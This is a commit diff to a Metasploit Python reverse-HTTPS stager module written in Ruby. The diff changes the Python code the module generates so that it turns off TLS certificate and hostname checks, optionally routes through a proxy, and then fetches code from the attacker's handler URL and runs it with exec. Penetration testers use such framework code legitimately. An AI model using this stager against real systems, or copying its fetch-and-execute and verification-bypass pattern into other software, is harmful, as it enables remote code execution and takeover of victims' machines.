|
8 | 8 |
|
9 | 9 | module Metasploit3
|
10 | 10 |
|
11 |
| - CachedSize = 446 |
| 11 | + CachedSize = 742 |
12 | 12 |
|
13 | 13 | include Msf::Payload::Stager
|
14 | 14 |
|
@@ -55,18 +55,32 @@ def generate
|
55 | 55 | proxy_host = datastore['PayloadProxyHost'].to_s
|
56 | 56 | proxy_port = datastore['PayloadProxyPort'].to_i
|
57 | 57 |
|
58 |
| - cmd = "import sys\n" |
59 | 58 | if proxy_host == ''
|
60 |
| - cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n" |
| 59 | + urllib_fromlist = "['HTTPSHandler','build_opener']" |
61 | 60 | else
|
| 61 | + urllib_fromlist = "['HTTPSHandler','ProxyHandler','build_opener']" |
| 62 | + end |
| 63 | + |
| 64 | + cmd = "import sys\n" |
| 65 | + cmd << "vi=sys.version_info\n" |
| 66 | + cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=#{urllib_fromlist})\n" |
| 67 | + cmd << "hs=[]\n" |
| 68 | + # Context added to HTTPSHandler in 2.7.9 and 3.4.3 |
| 69 | + cmd << "if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3):\n" |
| 70 | + cmd << "\timport ssl\n" |
| 71 | + cmd << "\tsc=ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n" |
| 72 | + cmd << "\tsc.check_hostname=False\n" |
| 73 | + cmd << "\tsc.verify_mode=ssl.CERT_NONE\n" |
| 74 | + cmd << "\ths.append(ul.HTTPSHandler(0,sc))\n" |
| 75 | + |
| 76 | + if proxy_host != '' |
62 | 77 | proxy_url = Rex::Socket.is_ipv6?(proxy_host) ?
|
63 | 78 | "http://[#{proxy_host}]:#{proxy_port}" :
|
64 | 79 | "http://#{proxy_host}:#{proxy_port}"
|
65 |
| - |
66 |
| - cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n" |
67 |
| - cmd << "o=ul.build_opener(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n" |
| 80 | + cmd << "hs.append(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n" |
68 | 81 | end
|
69 | 82 |
|
| 83 | + cmd << "o=ul.build_opener(*hs)\n" |
70 | 84 | cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
|
71 | 85 | cmd << "exec(o.open('#{target_url}').read())\n"
|
72 | 86 |
|
|
0 commit comments